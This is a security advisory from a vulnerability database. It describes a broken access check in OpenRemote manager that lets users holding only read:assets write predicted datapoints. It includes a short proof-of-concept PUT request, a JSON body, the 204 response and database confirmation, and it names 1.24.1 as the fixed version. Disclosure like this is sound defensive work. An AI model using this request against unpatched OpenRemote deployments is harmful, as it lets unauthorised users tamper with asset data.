VDB
KO
MEDIUM 4.3

GHSA-xj53-j257-hxvg

OpenRemote read-only asset users can write predicted datapoints

Details

# Summary

The predicted datapoint write endpoint allows users with only `read:assets` privileges to write predicted datapoints.

The endpoint:

```text PUT /api/{realm}/asset/predicted/{assetId}/{attributeName} ```

accepts write requests from users lacking `write:assets`.

The implementation appears to check `READ_ASSETS` while performing a write operation through:

```java assetPredictedDatapointService.updateValues(...) ```

# PoC

A user was created with only:

```text read:assets ```

and without `write:assets`.

The following request succeeded:

```http PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperature ```

Request body:

```json [{"x":1779199999001,"y":1337}] ```

Response:

```text HTTP/2 204 ```

Database verification confirmed the datapoint was written successfully:

```text entity_id: 4Fr8Pcp7iDjrEmoSUFolvT attribute_name: temperature value: 1337 ```

# Impact

Users with read-only asset permissions can modify predicted datapoints for assets.

Are you affected?

Enter the version of the package you're using.

Affected packages

Maven / io.openremote:openremote-manager
Introduced in: 0 Fixed in: 1.24.1
Fix # pom.xml: bump <version>1.24.1</version> for io.openremote:openremote-manager

References